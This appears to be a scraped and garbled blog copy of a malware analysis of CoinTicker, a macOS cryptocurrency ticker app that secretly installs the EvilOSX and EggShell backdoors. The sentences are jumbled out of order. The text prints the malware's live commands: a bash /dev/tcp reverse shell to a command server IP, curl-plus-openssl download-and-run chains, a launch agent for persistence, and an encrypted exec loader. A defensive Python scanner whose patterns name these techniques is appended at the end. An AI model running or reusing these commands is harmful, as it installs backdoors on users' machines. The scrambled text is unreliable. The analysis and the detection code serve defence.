realityloha.blogg.se

Coin tick mac

"""Minimal bot which loads modules as they are needed from the server.""" TjO1GlH1+7cP7pDYa8ykBquk4WhU0/UqE' | openssl aes-256-cbc -A -d -a -k %s -md md5" % get_uid()).readlines()))Įxtracting the script reveals that it is the bot.py script from the EvilOSX backdoor made by Github user Marten4n6. Return "".join(x.encode("hex") for x in (getpass.getuser() + "-" + str(uuid.getnode())))Įxec("".join(os.popen("echo 'U2FsdGVkX19GsbCj4lq2hzo27vqseHTtKbNTx9 (We believe these names are randomized, but unfortunately the CoinTicker app has stopped functioning, so we have been unable to confirm.) This script is encoded to hide the content: #!/usr/bin/env python UpQZdhkKfCdSYxg, which is home to a Python script named plQqVfeJvGo.

coin tick mac

Coin tick mac software#

The software also creates a folder within the user’s Containers folder named. If it seems like this results in the espl binary being launched multiple times, that is indeed the case. Nohup curl -k -L -o /tmp/.info.enc openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq python /tmp/.info.py ist, that runs the same command periodically: The CoinTicker app also creates a user launch agent, named. Next, it downloads the the EggShell mach-o binary, saving it to /tmp/espl: curl -k -L -o /tmp/espl įinally, it creates and runs a shell script at /tmp/.server.sh, which also establishes a reverse shell. (The domain resolves to this IP address.) First it opens a reverse shell connection to a command & control server, using the following command: nohup bash &> /dev/tcp/94.156.189.77/2280 0>&1 Finally, it executes the resulting Python script. Next, it uses openssl to decode that file into a hidden Python file named. The first part of the command downloads an encoded file from a Github page belonging to a user named “youarenick” and saves that file to a hidden file named.

coin tick mac

Coin tick mac download#

The app executes the following shell command to download a custom-compiled version of the EggShell server for macOS: nohup curl -k -L -o /tmp/.info.enc openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq python /tmp/.info.py When launched, however, the app downloads and installs components of two different open-source backdoors: EvilOSX and EggShell. Without any signs of trouble, such as requests for authentication to root, there’s nothing to suggest to the user that anything is wrong. The app’s preferences allow the user to customize the display, showing information about a wide variety of cryptocurrencies, including Bitcoin, Etherium, and Monero.Īlthough this functionality seems to be legitimate, the app is actually up to no good in the background, unbeknownst to the user. Once downloaded, the app displays an icon in the menu bar that gives information about the current price of Bitcoin. The CoinTicker app, on the surface, appears to be a legitimate application that could potentially be useful to someone who has invested in cryptocurrencies. It seems that the app is covertly installing not just one but two different backdoors.

coin tick mac

An astute contributor to our forums going by the handle 1vladimir noticed that an app named CoinTicker was exhibiting some fishy behavior over the weekend.
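One defensive check that follows from the persistence mechanism described above, written as an added example that is not part of the original post: it parses a user LaunchAgent plist and flags the command-line indicators quoted in the write-up (a hidden /tmp dropper fetched with curl, openssl decryption of a /tmp file, a hidden /tmp Python script being run, a bash /dev/tcp reverse shell, and the /tmp/espl path). The sample plist contents, label and download URL are constructed for the example.

```python
"""Flag LaunchAgent plists whose ProgramArguments match the CoinTicker
persistence chain described above (constructed example, not from the post)."""
import plistlib
import re
from typing import List

# Indicators taken from the command lines quoted in the write-up.
INDICATORS = [
    ("curl to hidden /tmp dropper", re.compile(r"curl\b.*-o\s+/tmp/\.\S+")),
    ("openssl decrypt of /tmp file", re.compile(r"openssl\s+enc\b.*-d\b.*-in\s+/tmp/")),
    ("python run of hidden /tmp script", re.compile(r"python[23]?\s+/tmp/\.\S+\.py")),
    ("bash /dev/tcp reverse shell", re.compile(r"bash\b.*/dev/tcp/\d{1,3}(\.\d{1,3}){3}/\d+")),
    ("EggShell espl payload path", re.compile(r"/tmp/espl\b")),
]

def suspicious_indicators(command: str) -> List[str]:
    """Return the name of every indicator that matches a flattened command line."""
    return [name for name, rx in INDICATORS if rx.search(command)]

def scan_launch_agent(plist_bytes: bytes) -> List[str]:
    """Parse a LaunchAgent plist and check its ProgramArguments for the chain."""
    agent = plistlib.loads(plist_bytes)
    command = " ".join(str(a) for a in agent.get("ProgramArguments", []))
    hits = suspicious_indicators(command)
    # A matching command that also auto-starts or repeats is the persistence pattern itself.
    if hits and (agent.get("RunAtLoad") or agent.get("StartInterval")):
        hits.append("persists via RunAtLoad/StartInterval")
    return hits

# Constructed sample modelled on the launch agent described above; label and URL are placeholders.
SAMPLE_AGENT = plistlib.dumps({
    "Label": "com.example.cointicker-agent",
    "ProgramArguments": ["/bin/sh", "-c",
        "nohup curl -k -L -o /tmp/.info.enc https://example.invalid/info.enc; "
        "openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq; "
        "python /tmp/.info.py &"],
    "StartInterval": 60,
})
# Constructed benign agent for comparison.
BENIGN_AGENT = plistlib.dumps({
    "Label": "com.example.backup",
    "ProgramArguments": ["/usr/bin/rsync", "-a", "/Users/me/Documents", "/Volumes/Backup/"],
    "StartInterval": 3600,
})

if __name__ == "__main__":
    for name, data in (("sample", SAMPLE_AGENT), ("benign", BENIGN_AGENT)):
        print(name, scan_launch_agent(data) or "clean")
```

Pointing scan_launch_agent at each file under ~/Library/LaunchAgents gives a quick triage of the persistence artifact; the /tmp and Containers paths named above still need a separate filesystem check.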










